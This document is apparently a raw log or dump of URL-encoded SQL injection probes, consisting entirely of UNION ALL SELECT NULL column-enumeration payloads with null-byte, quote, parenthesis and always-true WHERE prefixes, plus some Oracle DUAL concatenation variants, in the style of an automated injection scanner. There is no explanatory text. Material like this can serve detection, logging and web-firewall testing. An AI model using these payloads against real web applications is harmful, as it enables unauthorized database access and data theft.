1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%201093%3D1093%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206598%3D6598%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206989%3D6989%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%205213%3D5213%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206700%3D6700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%204591%3D4591%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%207327%3D7327%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206435%3D6435%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206844%3D6844%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%204262%3D4262%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206492%3D6492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%208495%3D8495%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%204036%3D4036%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206294%3D6294%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%205337%3D5337%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%209213%3D9213%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%201912%3D1912%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%204600%3D4600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%201118%3D1118%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%202787%3D2787%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%208286%3D8286%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%208167%3D8167%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%207238%3D7238%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%206774%3D6774%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%201619%3D1619%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%208952%3D8952%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%209809%3D9809%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%209623%3D9623%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%205891%3D5891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%201021%3D1021%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207742%3D7742%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%201266%3D1266%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%203015%3D3015%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%206766%3D6766%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%201758%3D1758%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%205596%3D5596%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%209160%3D9160%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%208106%3D8106%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%208876%3D8876%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%209668%3D9668%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27BxuH%27%20FROM%20DUAL%20WHERE%203008%3D3008%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27qUjV%27%20FROM%20DUAL%20WHERE%205538%3D5538%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 